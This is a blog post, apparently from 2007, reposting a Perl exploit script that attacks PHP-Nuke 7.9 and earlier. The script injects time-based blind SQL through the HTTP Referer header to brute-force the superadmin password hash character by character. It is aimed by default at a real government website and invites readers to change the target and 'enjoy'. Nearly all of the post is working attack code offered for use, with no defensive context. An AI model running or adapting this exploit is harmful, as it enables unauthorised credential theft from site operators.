POSTNUKE <=7.9 0day

    [晴 May 6, 2007 10:01 | by ]
POSTNUKE <=7.9 0day
#!/usr/bin/perl
#0day
exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)
#root_unix www.unixcrew.org
#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection


#!/usr/bin/perl

#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)

#root_unix www.unixcrew.org

#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection

#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy

use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;


my $host = "http://www.softwarelivre.gov.br";

my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(GET => $host);

my $referer;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;

@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);


$referer="http://www.hackingz0ne.altervista.org";
$tempodefault=richiesta($referer);
$hash="";


#QUERY RISULTANTE    
#INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')
   
for ($i=1;$i<33;$i++)
  {
  for ($j=0;$j<16;$j++)
  {
     $referer="http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*";
     $tempo=richiesta($referer);
     aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
     if($tempo>9)
     {
        $tempo=richiesta($referer);
        aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
        if($tempo>9)
        {
           $hash .=chr($array[$j]);
           aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
           $j=200;
        }
     }
     
  }
  if($i==1)
  {
     if($hash eq "")
     {
        $i=200;
        print "Attacco Fallito Sito Fixato\n";
     }
  }
}


  print "Attacco Terminato\n\n";

system("pause");


sub richiesta{
  $referer=$_[0];
  $metodo->referrer($referer);
  $inizio=Time::HiRes::time();
  $risposta=$useragent->request($metodo);
  $risposta->is_success or die "$host : ",$risposta->message,"\n";
  $fine=Time::HiRes::time();
  $tempo=$fine-$inizio;
  return $tempo
}

sub aggiorna{
  system("cls");
  @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
  print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n";
  print "Visit www.Hackingz0ne.altervista.org\n\n";
  print "Sito Vittima : " . $_[0] . "\n";
  print "Tempo Default : " . $_[1] . " secondi\n";
  print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
  print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
  print "Tempo sql : " . $_[4] . " secondi\n";
  print "Hash : " . $_[3] . "\n";
}
Tags: , ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(9962)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive